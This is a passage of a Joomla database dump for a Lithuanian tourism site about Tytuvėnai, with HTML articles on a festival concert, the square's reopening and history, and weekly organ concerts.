none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span>{gallery cols=5 orientation=horizontal width=300}stories/naujienos/tvf_2017_1{/gallery}</span></span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Koncerte dalyvavo Jos Ekselencija Estijos ambasadorė su vyru, Kelmės rajono vadovai, festivalio globėjas agrarinių mokslų daktaras Jonas Jagminas, Festivalio meno vadovas, Lietuvos nacionalinės premijos laureatas Robertas Šervenikas, kiti garbingi svečiai bei gausus būrys žiūrovų iš Tytuvėnų, Šiaulių, Kauno, Kelmės, Prienų ir kitų šalies miestų. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Tai šiemet buvo vienintelis ansamblio \"Hortus Musicus\" koncertas Lietuvoje, parengtas specialiai Tytuvėnų festivaliui.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> Koncertą tiesiogiai transliavo \" LRT klasika\", transliaciją vedė Jūratė Katinaitė.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 12.16px;\"> </span></p>',1,0,0,44,'2017-06-13 05:56:05',135,'','2017-06-13 06:06:32',135,0,'0000-00-00 00:00:00','2017-06-13 05:56:05','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tvf_2017_1\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,93,'','',1,2800,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(288,377,'Tytuvėnų aikštės atidarymas','tytuvenu-aikstes-atidarymas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės r. savivaldybė kviečia liepos 6 d. atvykti į Tytuvėnų aikštės atidarymo renginį.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/aikste/aikste.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></span></span></p>',1,0,0,44,'2017-07-01 11:32:10',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2017-07-01 11:32:10','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/aikste\\/main_aikste.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,92,'','',1,3038,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(289,378,'Vargonų muzikos koncertai','vargonu-muzikos-koncertai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Informuojame, kad nuo liepos mėnesio prasideda vargonų koncertai Tytuvėnų Švč. M. Marijos Angelų Karalienės bažnyčioje.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Koncertų laikas kiekvieną ketvirtadienį 12:00, 13:00 ir 14:00 valandomis. Koncerto kaina - auka.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Norintys užsisakyti koncertą individualioms grupėms, kreipkitės telefonu 8 674 97392 arba el. paštu <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></span></p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/vargonu_muzika/pranciskus 026.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>',1,0,0,44,'2017-07-17 05:18:54',135,'','2017-07-17 05:18:58',135,0,'0000-00-00 00:00:00','2017-07-17 05:18:54','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vargonu_muzika\\/vargonai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,91,'','',1,2721,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(290,379,'Vargonų muzikos koncertai (2)','vargonu-muzikos-koncertai-2','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Informuojame, kad nuo liepos mėnesio prasideda vargonų koncertai Tytuvėnų Švč. M. Marijos Angelų Karalienės bažnyčioje.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Koncertų laikas kiekvieną ketvirtadienį 12:00, 13:00 ir 14:00 valandomis. Koncerto kaina - auka.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Norintys užsisakyti koncertą individualioms grupėms, kreipkitės telefonu 8 674 97392 arba el. paštu <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></span></p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/vargonu_muzika/pranciskus 026.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>',-2,0,0,44,'2017-07-17 05:18:54',135,'','2017-07-17 05:18:58',0,0,'0000-00-00 00:00:00','2017-07-17 05:18:54','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vargonu_muzika\\/vargonai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,3,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(291,380,'Tytuvėnų aikštė...ir jos istorija','laiko1','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>2017 m. liepos 6 dieną po rekonstrukcijos atidaryta Tytuvėnų miesto aikštė.</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=350}stories/naujienos/taikste{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tai istorinė miestelio vieša erdvė iš turgavietės virtusi puošnia aikšte.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Žemiau pateikti įvykiai liudijantys seniausius miestelio aikštės istorijos faktus.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">...Į Tytuvėnus atsikėlus bernardinams (1614 m.) ir laikinai apsigyvenus mediniuose namuose prie šv. Jurgio bažnytėlės, kilo smarkus ginčas dėl ansamblio statybų vietos. Bernardinai norėjo bažnyčią ir vienuolyną statyti kiek atokiau nuo turgaus aikštės, pušyno pakraštyje, o dalis statybinių medžiagų jau buvo suvežta prie aikštės rytų kraštinės, ant kalvelės prie užtvenkto ežeriuko...</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> K.Čerbulėnas A. Baliulis. Tytuvėnų architektūros ansamblis</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; 